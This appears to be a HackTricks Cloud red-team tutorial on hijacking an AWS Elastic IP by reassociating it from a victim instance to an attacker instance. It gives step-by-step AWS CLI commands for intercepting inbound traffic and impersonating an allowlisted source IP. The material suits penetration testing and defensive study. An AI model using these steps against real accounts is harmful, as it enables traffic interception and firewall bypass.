HackTricks CloudAWS - Elastic IP Hijack for Ingress/Egress IP Impersonation
Reading time: 3 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Summary
Abuse ec2:AssociateAddress (and optionally ec2:DisassociateAddress) to re-associate an Elastic IP (EIP) from a victim instance/ENI to an attacker instance/ENI. This redirects inbound traffic destined to the EIP to the attacker and also lets the attacker originate outbound traffic with the allowlisted public IP to bypass external partner firewalls.
Prerequisites
- Target EIP allocation ID in the same account/VPC.
- Attacker instance/ENI you control.
- Permissions:
ec2:DescribeAddressesec2:AssociateAddresson the EIP allocation-id and on the attacker instance/ENIec2:DisassociateAddress(optional). Note:--allow-reassociationwill auto-disassociate from the prior attachment.
Attack
Variables
REGION=us-east-1
ATTACKER_INSTANCE=<i-attacker>
VICTIM_INSTANCE=<i-victim>
- Allocate or identify the victim’s EIP (lab allocates a fresh one and attaches to victim)
ALLOC_ID=$(aws ec2 allocate-address --domain vpc --region $REGION --query AllocationId --output text)
aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $VICTIM_INSTANCE --region $REGION
EIP=$(aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION --query Addresses[0].PublicIp --output text)
- Verify the EIP currently resolves to the victim service (example checks for a banner)
curl -sS http://$EIP | grep -i victim
- Re-associate the EIP to the attacker (auto-disassociates from victim)
aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $ATTACKER_INSTANCE --allow-reassociation --region $REGION
- Verify the EIP now resolves to the attacker service
sleep 5; curl -sS http://$EIP | grep -i attacker
Evidence (moved association):
aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION \
--query Addresses[0].AssociationId --output text
Impact
- Inbound impersonation: All traffic to the hijacked EIP is delivered to the attacker instance/ENI.
- Outbound impersonation: Attacker can initiate traffic that appears to originate from the allowlisted public IP (useful to bypass partner/external source IP filters).
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.